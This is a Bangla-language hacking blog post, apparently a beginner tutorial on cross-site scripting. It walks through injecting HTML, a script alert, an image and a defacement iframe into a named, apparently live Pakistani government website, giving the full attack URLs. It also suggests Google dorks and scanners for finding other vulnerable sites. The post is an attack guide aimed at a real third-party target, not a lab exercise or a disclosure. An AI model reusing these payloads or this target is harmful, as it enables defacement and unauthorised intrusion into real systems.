Xss Attack Basic Tutorial In Bangla

Xss Attack Basic Tutorial In Bangla

21:54

সবাইকে সাগতম হ্যাক স্কুল বিডির টিউটোরিয়ালে।
আজকে আমি Xss Method ব্যাবহার করে কিভাবে ওয়েবসাইট এট্যাক করা যায় সেটা দেখানোর চেষ্টা করবো ।
XXS কি ?
Xss হচ্ছে এমন এক ধরনের সিকিউরিটি ভুলনরাবেলেটি যা ওয়েব এপ্লিকেশনের মধ্যে পাওয়া যায় । XSS ভুলনারাবেলেটি ব্যাবহার করে আমরা ভুলনরাবল স্ক্রিপ্ট RUN করাতে পারি ওয়েব এপ্লিক্যাশনে এই দুই ধরনের মেথড
ব্যাবহার করে। browser side, server side.
কথা না বাড়িয়ে কাজে চলে যায় । !  XSS vulnerable site বের করার জন্যে google dork ব্যাবহার করতে পারেন ।অথবা ভুলনরাবেলেটি স্ক্যানার Acunetix Net SPark
ইত্যাদি ব্যাবহার করতে পারনে ।
আমি আগে থেকেই একটি ওয়েবসাইট বের করে রেখেছি ।

vulnerable URL :

http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=

প্রথমেই আমি একটি HTML ট্যাগ রান করে দেখায় ।
http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=<h1>XSS ATTACK</h1>
আপনি ওয়েবসাইটের কন্টেন্টে XSS ATTACK লেখাটি দেখতে পাবেন ।
এবার একটি স্ক্রিপ্ট রান করিয়ে দেখা যাক!
<script>alert("XSS VULN")</script>
-
ওয়েবসাইটে কি দেখায় দেখি তাহলেঃ
http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=<script>alert("XSS VULN")</script>
দেখতে পাবেন একটি বক্স ওপেন হচ্ছে যেটাতে লেখা XSS VULN.
যায় হোক এবার একটি ইমেজ এড করে দেখিঃ
http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=<center><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQX75_GmxMcslMbceW1rQoYdBzLFjobfWIMMDyMZe5dJkkaSmeBMcZdUbyja2soR5j7CRUvUWw74BTjXPun9bDynRZ8nJFMZ_sqczGnWOEYG9IuUxJ1WsCIqpwGT0GdF-b4a-GpkVKIGHy/s1600/xss.jpg" hight=800 widht=1030> </center>
এখন ওয়েব কন্টেন্টে একটি ছবি দেখতে পাবেন !
-
এবার দেখি ডিফেস পেইজ কিভাবে এড করা যায় সেটাঃ
<iframe src="http://www.rpd.ie/xssd.html" height 768 width=1024>
-
http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=<iframe src="http://www.rpd.ie/xssd.html" height 768 width=1024>
-
এটা ছিলো বেসিক XSS ATTACK নিয়ে টিউটোরিয়াল। সামনের টিউটোরিয়ালে এডভান্স XSS ATTACK নিয়ে লেখার ইচ্ছে আছি :)
ধন্যবাদ।

লেখাটি প্রথম প্রকাশিত হয়েছিল আমার ব্লগেঃ

http://hackforlearnbd.blogspot.com/

আমি আছি ফেইসবুকেঃ

https://www.facebook.com/bb.benjamin101

Next
« Prev Post
Previous
Next Post »

পোস্ট সম্পর্কিত সমস্যার জন্য মন্তব্য দিন।ডাউনলোড লিঙ্ক এ সমস্যা জন্য ইনবক্স করুন Aimzworld007
ConversionConversion EmoticonEmoticon

Thanks for your comment
Subscribe to: Post Comments (Atom)